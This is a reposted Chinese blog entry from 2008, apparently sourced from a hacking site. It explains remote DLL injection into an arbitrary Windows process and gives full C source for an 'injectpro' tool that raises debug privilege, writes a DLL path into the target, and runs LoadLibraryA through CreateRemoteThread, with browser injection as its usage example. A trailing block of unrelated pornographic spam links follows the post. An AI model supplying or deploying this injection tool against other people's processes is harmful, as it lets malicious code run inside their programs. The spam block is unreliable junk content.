• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>

            c++初學者

            專注技術開發

            【轉】向任意進程注入DLL

            可能這對高手來說已經是老掉牙的東西了,

            還是來說說原理把(本人也是菜鳥啊)!
            遠程注入就是在目標進程中用VirtualAllocEx申請一段內存,
            然后用WriteProcessMemory函數將自己dll的完整路徑復制到遠程進程中,
            然后在Kernel32中計算LoadLibraryA的地址,再調用LoadLibraryA函數加載遠程dll,
            并在CreateRemoteThread創建遠程進程!
            Code Language : C
            #include \"stdafx.h\"
            #include \"windows.h\"
            #include \"tlhelp32.h\"
            #include \"stdio.h\"
            #pragma comment(lib,\"ws2_32\")
             
            int EnableDebugPriv(const char * name)//提提權函數
            {
              HANDLE hToken;
              TOKEN_PRIVILEGES tp;
              LUID luid;
              //打開進程令牌環
              if(!OpenProcessToken(GetCurrentProcess(),
              TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
                &hToken))
              {
                MessageBox(NULL,\"OpenProcessToken Error!\",\"Error!\",MB_OK);
                 return 1;
             }
             //獲得進程本地唯一ID
             if(!LookupPrivilegeValue(NULL,name,&luid))
             {
               MessageBox(NULL,\"LookupPrivivlegeValue Error!\",\"Error\",MB_OK);
             }
             tp.PrivilegeCount=1;
             tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
             tp.Privileges[0].Luid=luid;
             //調整權限
             if(!AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL))
             {
               MessageBox(NULL,\"AdjustTokenPrivileges Error!\",\"Error\",MB_OK);
               return 1;
             }
             return 0;
            }
            BOOL injectit(const char *DllPath,const DWORD dwRemoteProcessld)//注入主函數
            {
             HANDLE hrp;
             if(EnableDebugPriv(SE_DEBUG_NAME))
             {
               MessageBox(NULL,\"Add Privilege Error!\",\"Error\",MB_OK);
               return FALSE;
             }
             if((hrp=OpenProcess(PROCESS_CREATE_THREAD|//允許遠程創建線程
               PROCESS_VM_OPERATION|//允許遠程VM操作
               PROCESS_VM_WRITE,//允許遠程VM寫
               FALSE,dwRemoteProcessld))==NULL)
             {
               MessageBox(NULL,\"OpenProcess Error!\",\"Error\",MB_OK);
               return FALSE;
             }
             char *psLibFileRemote;
             //使用VirtualAllocEx函數在遠程進程的內存地址空間分配DLL文件名緩沖
             psLibFileRemote=(char *)VirtualAllocEx(hrp,NULL,lstrlen(DllPath)+1,
               MEM_COMMIT,PAGE_READWRITE);
             if(psLibFileRemote==NULL)
             {
               MessageBox(NULL,\"VirtualAllocEx Error!\",\"Error\",MB_OK);
               return FALSE;
             }
             //使用WriteProcessMemory函數將DLL的路徑名復制到遠程的內存空間
             if(WriteProcessMemory(hrp,psLibFileRemote,(void *)DllPath,lstrlen(DllPath)+1,NULL)==0)
             {
               MessageBox(NULL,\"WriteProcessMemory Error!\",\"Error\",MB_OK);
               return FALSE;
             }
             //計算LoadLibraryA的入口地址
             PTHREAD_START_ROUTINE pfnStartAddr=(PTHREAD_START_ROUTINE)
               GetProcAddress(GetModuleHandle(TEXT(\"Kernel32\")),\"LoadLibraryA\");
             if(pfnStartAddr==NULL)
             {
               MessageBox(NULL,\"GetProcAddress Error!\",\"Error\",MB_OK);
               return FALSE;
             }
             //pfnStartAddr地址就是LoadLibraryA的入口地址
             
             
             HANDLE hrt;
             if((hrt=CreateRemoteThread(hrp,
               NULL,
               0,
               pfnStartAddr,
               psLibFileRemote,
               0,
               NULL))==NULL)
             {
               MessageBox(NULL,\"CreateRemote Error!\",\"Error\",MB_OK);
               return FALSE;
             }
             return TRUE;
            }
            unsigned long getpid(char *pn)//得到進程pid
            {
             BOOL b;
             HANDLE hnd;
             PROCESSENTRY32 pe;
             //得到進程快照
             hnd=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
             pe.dwSize=sizeof(pe);
             b=Process32First(hnd,&pe);
             while(b)
             {
               if(strcmp(pn,pe.szExeFile)==0)
                 return pe.th32ProcessID;
               b=Process32Next(hnd,&pe);
             }
            }
             
            int main(int argc, char* argv[])
            {
             if(argc<2)
             {
               printf(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\");
               printf(\"injectpro V1.0!\nAuthor:text QQ:52674548\nusage:\n injectpro.exe targetprocess youdll\n\");
               printf(\" eg:injectpro.exe iexplorer.exe c:\\youdll.dll\n\");
               printf(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\");
               return 0;
             }
             EnableDebugPriv(SE_DEBUG_NAME);//自身提權
             DWORD pid=getpid(argv[1]);
             //printf(\"%d\",pid);
             if(pid==0)
               return 1;
               if(injectit(argv[2],pid))
               {
                 printf(\"inject success!\");
               }
               else
               {
                 printf(\"inject error!\");
               }
             return 0;
            }

            本篇文章來源于 黑反在線-信息安全第一站 原文鏈接:http://www.hf110.com/hack/hackprg/200809/203556.html

            posted on 2008-09-28 12:24 大海 閱讀(1661) 評論(0)  編輯 收藏 引用 所屬分類: VC++

            国产精品久久网| 99久久精品国产一区二区| 久久精品国产亚洲沈樵| 中文字幕一区二区三区久久网站 | 婷婷综合久久中文字幕蜜桃三电影 | 亚洲天堂久久久| 国内精品久久久久久99| 久久精品无码av| 国产精品对白刺激久久久| 人妻少妇精品久久| 精品久久久久久成人AV| 久久伊人中文无码| 久久成人精品视频| 一本久久a久久精品亚洲| 亚洲精品高清国产一久久| 久久精品卫校国产小美女| 爱做久久久久久| 99久久久精品免费观看国产| 人妻无码精品久久亚瑟影视| 国产一区二区三精品久久久无广告| 亚洲伊人久久成综合人影院 | 久久综合九色综合久99| 久久免费视频网站| 国产成年无码久久久久毛片| 亚洲国产精品狼友中文久久久| 91久久精品91久久性色| 伊人久久大香线焦AV综合影院| 亚洲第一永久AV网站久久精品男人的天堂AV | 奇米影视7777久久精品| 麻豆久久久9性大片| 午夜精品久久久久久影视777| 99久久精品国产一区二区三区| 2020久久精品国产免费| 亚洲国产另类久久久精品小说| 伊人久久大香线蕉AV一区二区| 久久久久人妻一区精品果冻| 国产精品成人久久久久三级午夜电影| 国产精品久久亚洲不卡动漫| avtt天堂网久久精品| 久久久91精品国产一区二区三区 | 国产精品久久久久jk制服|